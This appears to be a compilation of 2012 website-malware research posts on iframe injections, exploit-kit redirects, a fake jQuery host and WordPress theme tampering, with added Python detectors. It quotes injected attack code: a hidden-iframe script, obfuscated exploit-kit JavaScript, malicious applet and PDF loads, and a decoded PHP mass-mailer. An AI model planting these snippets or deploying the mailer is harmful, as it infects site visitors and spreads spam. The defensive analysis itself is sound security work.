Iframes generator: http://wordpresstest2.info/1.txt

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curl or file_get_contents call to http://wordpresstest2.info/1.txt. When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

These are then displayed on the compromised sites.

Mass infections from fenwaywest.com/media/index.php

We are seeing a large number of sites compromised with an iframe pointing to http://fenwaywest.com/media/index.php. Just in the last 3 days, we identified almost 10,000 sites with it:

2012/Oct/11 - 4393 sites - http://fenwaywest.com/media/index.php
2012/Oct/10 - 3117 sites - http://fenwaywest.com/media/index.php
2012/Oct/09 -  865 sites - http://fenwaywest.com/media/index.php

All the compromised sites have an iframe similar to this one:

<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; ..

The domain is hosted at 50.28.53.157, but it is currently offline (redirecting to Google), so we can't really tell what it is doing. On previous requests, it redirected to a TDS (traffic distribution system) and from there sent the visitor on to multiple spam or malicious domains.

badgeplz.com Compromised

Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.

If you are using any widget/code from http://badgeplz.com/, remove it from your site asap. It has been compromised and is serving malicious code (Blackhole exploit kit), so any widget you load from there will serve that code from your site as well.

Example:

$ curl -D - http://badgeplz.com/instagram/?u=user
<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m= ..

Not only that, but their main site is compromised as well.

Iframes to Redkit exploit kit

A new batch of compromised sites is being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added:

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

There, it tries to make the browser load malicious PDF or Jar files:

<applet archive="http://orcasp.com.br/33256.jar"..

<iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

Fake jquery site

We are seeing many sites with fake jquery links on them from jquery-framework.com (just registered on 2012/08/05):

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jquery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting users to http://browser-31.com/s/3013.
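The three posts above each give a static indicator a site owner can grep for: a server-side curl/file_get_contents fetch of http://wordpresstest2.info/1.txt, an iframe (static, or built by JavaScript and pushed off-screen with negative top/left offsets) pointing at *.ftp1.biz/pony or fenwaywest.com, and a jQuery copy served from jquery-framework.com instead of a trusted host. The Python below is an added example for this page, not Sucuri's code. The indicator domains come from the posts; the list of trusted jQuery hosts is an assumption (the post names jquery.org and googleapis, jquery.com is added), and the sample HTML and PHP are constructed for the demo.

```python
import re
from urllib.parse import urlparse

# Indicator domains taken from the posts above: *.ftp1.biz/pony iframes,
# fenwaywest.com/media/index.php and the wordpresstest2.info/1.txt generator.
INDICATOR_DOMAINS = ("ftp1.biz", "fenwaywest.com", "wordpresstest2.info")

# Assumption: hosts a site owner would legitimately load jQuery from. The
# post names jquery.org and googleapis; jquery.com is added as an assumption.
TRUSTED_JQUERY_SUFFIXES = ("jquery.org", "jquery.com", "googleapis.com")

IFRAME_SRC_RE = re.compile(r'''<iframe[^>]*\bsrc\s*=\s*["']([^"']+)["']''', re.I)
SCRIPT_SRC_RE = re.compile(r'''<script[^>]*\bsrc\s*=\s*["']([^"']+)["']''', re.I)
JQUERY_FILE_RE = re.compile(r'''/jquery[-.\w]*\.js$''', re.I)
# DOM-built iframe pushed off-screen, as in the fenwaywest.com injection.
JS_IFRAME_RE = re.compile(r'''createElement\(\s*["']iframe["']\s*\)''', re.I)
JS_SRC_RE = re.compile(r'''\.src\s*=\s*["']([^"']+)["']''')
OFFSCREEN_RE = re.compile(r'''style\.(?:top|left)\s*=\s*["']-\d+(?:em|px)["']''', re.I)
# Server-side fetch of a remote URL in PHP (file_get_contents or curl).
REMOTE_FETCH_RE = re.compile(
    r'''(?:file_get_contents|curl_init|curl_setopt)\s*\([^;]*?(https?://[^"'\s)]+)''', re.I)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_indicator(host):
    return any(host == d or host.endswith("." + d) for d in INDICATOR_DOMAINS)


def is_trusted_jquery_host(host):
    return any(host == s or host.endswith("." + s) for s in TRUSTED_JQUERY_SUFFIXES)


def scan_html(html):
    """Return (kind, url) findings for one page of HTML."""
    findings = []
    for url in IFRAME_SRC_RE.findall(html):
        if is_indicator(host_of(url)):
            findings.append(("iframe-indicator-domain", url))
    for url in SCRIPT_SRC_RE.findall(html):
        if JQUERY_FILE_RE.search(urlparse(url).path) and not is_trusted_jquery_host(host_of(url)):
            findings.append(("jquery-from-untrusted-host", url))
    if JS_IFRAME_RE.search(html):
        offscreen = bool(OFFSCREEN_RE.search(html))
        for url in JS_SRC_RE.findall(html):
            if offscreen:
                findings.append(("js-hidden-iframe", url))
            elif is_indicator(host_of(url)):
                findings.append(("js-iframe-indicator-domain", url))
    return findings


def scan_php(source):
    """Flag server-side fetches of an indicator URL (the 1.txt generator pattern)."""
    return [("remote-fetch-indicator", url)
            for url in REMOTE_FETCH_RE.findall(source) if is_indicator(host_of(url))]


# Constructed sample page: one benign iframe, one static *.ftp1.biz/pony iframe,
# one fenwaywest-style off-screen iframe and a jQuery copy from an untrusted host.
SAMPLE_HTML = """<html><body>
<iframe src="https://www.youtube.com/embed/constructed" width="400"></iframe>
<iframe src="http://lsghmr.ftp1.biz/pony" width="0" height="0"></iframe>
<script src="http://jquery-framework.com/jquery-1.7.1.js"></script>
<script>function frmAdd(){var ifrm=document.createElement("iframe");
ifrm.style.position='absolute';ifrm.style.top='-999em';ifrm.style.left='-999em';
ifrm.src="http://fenwaywest.com/media/index.php";ifrm.id='frmId';
document.body.appendChild(ifrm);};window.onload=frmAdd;</script>
</body></html>"""

# Constructed PHP with the pattern the first post says to look for.
SAMPLE_PHP = '$code = file_get_contents("http://wordpresstest2.info/1.txt");\neval($code);'

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_HTML) + scan_php(SAMPLE_PHP):
        print(f"{kind:28} {url}")
```

The off-screen check is deliberately independent of the domain list: an attacker rotating domains (as the ftp1.biz subdomains above rotate) still has to hide the frame, so negative top/left offsets on a DOM-created iframe are worth flagging on their own.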

Rebots.php on WordPress

We are seeing a new batch of the rebots.php infections on WordPress, and one thing is intriguing us. On many sites we are analysing, WordPress is up to date and no suspicious backdoors or plugins were found. All in order, except for the javascript injected inside the theme.

The only thing they have in common is a single login to wp-admin, followed by a visit to wp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically, since no CSS or .JS files were loaded.
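The pattern in these log lines (a successful login POST followed seconds later by a POST to theme-editor.php, with no CSS or JS requests in between) is easy to hunt for across an access log. The Python below is an added example, not Sucuri's tooling: it parses Apache combined-log lines, groups them by client IP, and flags login-then-theme-edit sequences, marking those without any static asset loads as likely automated, which is the heuristic the post applies. The sample log lines are constructed (RFC 5737 addresses), mirroring the requests quoted above.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined-log prefix: ip ident user [timestamp] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Drop the query string and collapse repeated slashes: the requests in the
    # post arrive as ///wp-login.php and //wp-admin/theme-editor.php.
    path = re.sub(r"/+", "/", m["path"].split("?", 1)[0])
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "path": path, "status": int(m["status"])}


def find_theme_edit_logins(lines, window_seconds=120):
    """Per source IP: a wp-login POST answered with 302 followed within the
    window by a POST to theme-editor.php. Sessions that loaded no CSS/JS in
    between are marked likely_automated, the heuristic the post uses."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    hits = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, login in enumerate(recs):
            if not (login["method"] == "POST" and login["path"].endswith("/wp-login.php")
                    and login["status"] == 302):
                continue
            window = [r for r in recs[i + 1:]
                      if (r["ts"] - login["ts"]).total_seconds() <= window_seconds]
            edits = [r for r in window
                     if r["method"] == "POST" and r["path"].endswith("/wp-admin/theme-editor.php")]
            assets = [r for r in window if r["path"].endswith((".css", ".js"))]
            if edits:
                hits.append({
                    "ip": ip,
                    "login_at": login["ts"].isoformat(),
                    "theme_edit_at": edits[0]["ts"].isoformat(),
                    "static_assets_loaded": len(assets),
                    "likely_automated": len(assets) == 0,
                })
    return hits


# Constructed log lines: one scripted session like the one in the post, one
# human admin whose browser loads CSS/JS between login and edit, some noise.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""',
    '203.0.113.5 - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 - "-" ""',
    '203.0.113.5 - - [29/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""',
    '198.51.100.7 - - [29/Aug/2012:22:10:00 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Aug/2012:22:10:01 -0300] "GET /wp-admin/css/wp-admin.css HTTP/1.1" 200 10244 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Aug/2012:22:10:01 -0300] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 200 93000 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Aug/2012:22:11:30 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '192.0.2.9 - - [29/Aug/2012:22:12:00 -0300] "GET /index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_theme_edit_logins(SAMPLE_LOG):
        print(hit)
```

Run against a real log, every hit deserves a look, but the likely_automated ones with an empty User-Agent (as in the post's lines) are the ones to correlate with the theme file's modification time first.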

Another interesting issue is that on some of these sites, we didn't identify any brute force attack trying to guess the passwords. Just this single login.

Since we don't know how these passwords got stolen, we recommend changing your wp-admin passwords asap until we have more info (especially if you have been compromised with the rebots.php injection).

Server-wide iframe injections

Dennis (from unmask) posted about some iframe injections that he has been seeing lately: RFI: Server-wide iframe injections.

The post is interesting, so read that first. We are also seeing many variations of this attack, always with the iframes being injected as domain.com/[randomnumbers].html and redirecting the user to Fake AV. These are some of the URLs we are seeing:

     15 http://tiergefluester.ch/37624443.html
      8 http://qmg2.com/96344443.html
      6 http://52943578.nl.strato-hosting.eu/49404443.html
      5 http://nw-transporte.de/31374443.html
      4 http://soka.saitama-eastern.jp/68844443.html
      3 http://tvhr9.com/59304443.html
      3 http://tvhr9.com/48204443.html
      3 http://tijerasycosmetica.es/32154443.html
      3 http://sepatch.org/74734443.html
      3 http://qmg2.com/51204443.html
      3 http://photopassion34.eu/84364443.html
      2 http://sipsnstrokesstudios.com/90144443.html
      2 http://relance-clients.com/18304443.html
      2 http://langaz.pl/28074443.html
      2 http://kopian.net.pl/10344443.html
      2 http://huskiesfootball.ca/54924443.html
      2 http://humourr.com/77204443.html
      2 http://fam-vandenberg.nl/33604443.html
      2 http://dev.look-whos-talking.co.uk/75584443.html
      2 http://cadeauxentreprise.ca/40104443.html
      1 http://www.sportman.nl/44554443.html
      1 http://vanaden.nl/76644443.html
      1 http://tvhr9.com/92824443.html
      1 http://tvhr9.com/15374443.html
      1 http://tijerasycosmetica.es/68134443.html
      1 http://tiergefluester.ch/71834443.html
      1 http://tiergefluester.ch/47254443.html
      1 http://thomasvillefurnishings.ca/66124443.html
      1 http://soka.saitama-eastern.jp/76924443.html
      1 http://soka.saitama-eastern.jp/31164443.html
      1 http://sipsnstrokesstudios.com/82464443.html
      1 http://shopmassive.com/72534443.html
      1 http://shopmassive.com/60754443.html
      1 http://shopmassive.com/50284443.html
      1 http://sepatch.org/58814443.html
      1 http://sepatch.org/35224443.html
      1 http://sepatch.org/14244443.html
      1 http://santeayurveda.com/48804443.html
      1 http://sacem.com.tr/95534443.html
      1 http://s1050444.iie.nl/76384443.html
      1 http://roswitha-jacobi.de/67874443.html
      1 http://roswitha-jacobi.de/52194443.html
      1 http://roswitha-jacobi.de/22914443.html
      1 http://roswitha-jacobi.de/15584443.html
      1 http://reisendefamilie.net/70004443.html
      1 http://rectol.com/76084443.html
      1 http://rectol.com/11154443.html
      1 http://radiocanvas.co.uk/97984443.html
      1 http://qmg2.com/82474443.html
      1 http://qmg2.com/76574443.html
      1 http://qmg2.com/74054443.html
      1 http://qmg2.com/34794443.html
      1 http://qmg2.com/20054443.html
      1 http://qmg2.com/14934443.html
      1 http://pohlgruppe.de/89314443.html
      1 http://pohlgruppe.de/73684443.html
      1 http://photopassion34.eu/93154443.html
      1 http://photopassion34.eu/35484443.html
      1 http://ozturannakliyat.com/94564443.html
      1 http://opracowaniagraficzne.pl/10474443.html
      1 http://nw-transporte.de/96284443.html
      1 http://mukogawa.jp/98984443.html
      1 http://moodle.fortpointdesign.com/31844443.html
      1 http://missweekderbesten.nl/12714443.html
      1 http://lojastelefrio.com.br/18854443.html
      1 http://linkeddoc.com/31974443.html
      1 http://langaz.pl/16524443.html
      1 http://kulycap.fr/63464443.html
      1 http://kopian.net.pl/69004443.html
      .. many many more ...

Note that all (or most) of these sites are compromised and being used by the attackers to spread malware, botnet style. Dennis also questioned how these sites are being hacked.

Initially, all of them were running Plesk (at least I could access it at site.com:8443). However, as the infection grows, I am seeing many sites not using Plesk with this type of malware, so we can't know for sure. We assume it is a mix of attacks (brute force FTP + outdated Plesk + anything they can find).
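The list above is what you get from extracting iframe targets across infected sites and counting them, and the one stable trait of this campaign is the URL shape domain.com/[randomnumbers].html. The Python below is an added example, not Sucuri's code: it pulls iframe sources out of scanned pages, keeps only those matching that shape, counts each URL once per infected site, and prints a count-sorted list in the same form as the one above. The page contents and host names are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlparse

IFRAME_SRC_RE = re.compile(r'''<iframe[^>]*\bsrc\s*=\s*["']([^"']+)["']''', re.I)
# The injected iframes in the post all look like domain.com/[randomnumbers].html
RANDOM_HTML_PATH_RE = re.compile(r'^/\d{6,}\.html$')


def is_random_number_html(url):
    p = urlparse(url)
    return p.scheme in ("http", "https") and bool(p.hostname) and bool(RANDOM_HTML_PATH_RE.match(p.path))


def rank_injected_iframes(pages):
    """pages: iterable of (site, html). Returns per-URL and per-host Counters,
    counting each injected URL once per infected site."""
    per_url, per_host = Counter(), Counter()
    for _site, html in pages:
        seen = set()
        for url in IFRAME_SRC_RE.findall(html):
            if is_random_number_html(url) and url not in seen:
                seen.add(url)
                per_url[url] += 1
                per_host[urlparse(url).hostname] += 1
    return per_url, per_host


def format_report(per_url):
    """Same shape as the count-sorted list above."""
    return "\n".join(f"{n:>7} {url}" for url, n in per_url.most_common())


# Constructed pages: placeholder hosts, paths following the injected pattern,
# plus one clean site whose iframe path does not match.
SAMPLE_PAGES = [
    ("victim1.example", '<html><iframe src="http://injected-a.example/37624443.html" width=1 height=1></iframe></html>'),
    ("victim2.example", '<html><iframe src="http://injected-a.example/37624443.html"></iframe>'
                        '<iframe src="http://injected-a.example/37624443.html"></iframe></html>'),
    ("victim3.example", '<html><iframe src="http://injected-a.example/37624443.html"></iframe>'
                        '<iframe src="http://injected-b.example/96344443.html"></iframe></html>'),
    ("clean.example", '<html><iframe src="https://maps.example/embed/1234.html"></iframe></html>'),
]

if __name__ == "__main__":
    per_url, per_host = rank_injected_iframes(SAMPLE_PAGES)
    print(format_report(per_url))
    print("by host:", dict(per_host))
```

The per-host counter is what you would feed to abuse contacts: the hosts carrying the .html landing pages are themselves compromised sites, as the post notes, not attacker infrastructure.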

Fake AV redirections .ru -> .pl

We posted yesterday about the Blackmuscats .htaccess redirection that was affecting thousands of web sites.

They are still happening (and growing), but the attackers decided to switch names to nonalco, mimosa and other random keywords for their files:

1251 redirections    http://fitnes-corp.ru/shurimuri?5
1093 redirections    http://infofitnes.ru/interactive?5
 818 redirections    http://fitnes-company.ru/interactive?5
 817 redirections    http://mir-fitnes.ru/interactive?5
 802 redirections    http://info-fitnes.ru/interactive?5
 788 redirections    http://fitnescompany.ru/interactive?5
 268 redirections    http://fitnes-corp.ru/shurimuri?5
 220 redirections    http://infofitnes.ru/interactive?5
 188 redirections    http://cofitnes.ru/mimosa?5
 177 redirections    http://mir-fitnes.ru/interactive?5
 168 redirections    http://fitnes-company.ru/interactive?5
 165 redirections    http://info-fitnes.ru/interactive?5
 162 redirections    http://fitnescompany.ru/interactive?5
  79 redirections    http://fitnescorp.ru/shurimuri?5
  40 redirections    http://nashfitnes.ru/nonalco?5
  37 redirections    http://cofitnes.ru/mimosa?5
1191 redirections    http://nashfitnes.ru/nonalco?5
 981 redirections    http://nash-fitnes.ru/nonalco?5
 953 redirections    http://supasweb.ru/blackmuscats?5
 920 redirections    http://nashifitnes.ru/nonalco?5
 895 redirections    http://nashafitnes.ru/nonalco?5
 878 redirections    http://nasha-fitnes.ru/nonalco?5
 555 redirections    http://fitnes-ltd.ru/shurimuri?5
 261 redirections    http://nashfitnes.ru/nonalco?5
 208 redirections    http://supasweb.ru/blackmuscats?5
 199 redirections    http://nash-fitnes.ru/nonalco?5
 190 redirections    http://nashafitnes.ru/nonalco?5
 189 redirections    http://nashifitnes.ru/nonalco?5
 180 redirections    http://nasha-fitnes.ru/nonalco?5
 116 redirections    http://fitnes-ltd.ru/shurimuri?5

The redirection chain is still the same: from those .ru domains to additional second-level .ru domains, and from there to a .pl:

http://russian-fitnes.ru/prunus/cerasus.php
http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/
http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/
http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/

So far we have identified more than 17,000 sites with this type of malware. More details as we track them.

PHP Spam tool (UnixStats Mass MaiLer)

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

But when switching the "eval" for "print", we could see the hidden mass mailer and what it was doing:

$secure = "racrewmania@googlemail.com";
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
..
<title>UnixStats Mass MaiLer</title>
..
for($xx=0; $xx<$amount; $xx++){
  for($x=0; $x<$numemails; $x++){
    $to = $allemails[$x];
    if ($to){
      $to = ereg_replace(" ", "", $to);
      $message = ereg_replace("&email&", $to, $message);
      $subject = ereg_replace("&email&", $to, $subject);
      print "Sending mail to $to.......";
      flush();
      $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
      $header .= "MIME-Version: 1.0\r\n";
      If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      $header .= "Content-Type: text/$contenttype\r\n";
      $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
      $header .= "$message\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
      If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
      If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
      If ($file_name) $header .= "$content\r\n";
      If ($file_name) $header .= "--$uid--";
      mail($to ..
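Swapping eval for print, as the post does, works but still runs whatever PHP surrounds the wrapper. The Python below is an added example, not Sucuri's tooling: it peels eval(gzinflate(base64_decode("..."))) layers statically (gzinflate is raw DEFLATE, so zlib with wbits=-15 decodes it), repeats until no wrapper remains, and then looks for the strings that gave this mailer away ($_POST handling, set_time_limit, mail(), the "Mass MaiLer" title). The obfuscated sample is constructed inside the block from a short inert stand-in for the decoded code; wrap_layer exists only to build that sample.

```python
import base64
import re
import zlib

# The wrapper the post describes: eval(gzinflate(base64_decode("...")))
LAYER_RE = re.compile(
    r'''eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)\s*\)''')


def unwrap_layer(php_source):
    """Decode one eval/gzinflate/base64 layer without executing it; None if absent."""
    m = LAYER_RE.search(php_source)
    if not m:
        return None
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    # PHP's gzinflate() is raw DEFLATE, which zlib exposes with wbits=-15.
    return zlib.decompress(blob, -15).decode("latin-1")


def unwrap_all(php_source, max_layers=32):
    """Peel nested layers; returns every stage, outermost first."""
    stages = [php_source]
    while len(stages) <= max_layers:
        inner = unwrap_layer(stages[-1])
        if inner is None:
            break
        stages.append(inner)
    return stages


# Strings worth flagging in the decoded result, taken from the mailer above.
MAILER_INDICATORS = (r"\bmail\s*\(", r"\$_POST\[", r"\$_FILES\[", r"set_time_limit\s*\(", r"Mass MaiLer")


def mailer_indicators(decoded):
    return [p for p in MAILER_INDICATORS if re.search(p, decoded)]


def wrap_layer(plain):
    """Constructed helper: builds one obfuscation layer so the demo is self-contained."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(plain.encode("latin-1")) + c.flush()
    return 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw).decode("ascii")


# Constructed, inert stand-in for the decoded mailer: just the tell-tale strings.
SAMPLE_PLAIN = ('<?php /* constructed */ @$emaillist=$_POST["emaillist"]; set_time_limit(0); '
                'echo "<title>UnixStats Mass MaiLer</title>"; mail($to, $subject, $message, $header); ?>')
SAMPLE_OBFUSCATED = "<?php " + wrap_layer(wrap_layer(SAMPLE_PLAIN)) + " ?>"

if __name__ == "__main__":
    stages = unwrap_all(SAMPLE_OBFUSCATED)
    print(f"{len(stages) - 1} layer(s) removed")
    print(stages[-1])
    print("indicators:", mailer_indicators(stages[-1]))
```

Real samples often nest several layers, and some mix in str_rot13 or string reversal between them; the loop above stops at the first stage it cannot decode, which is exactly the stage to inspect by hand.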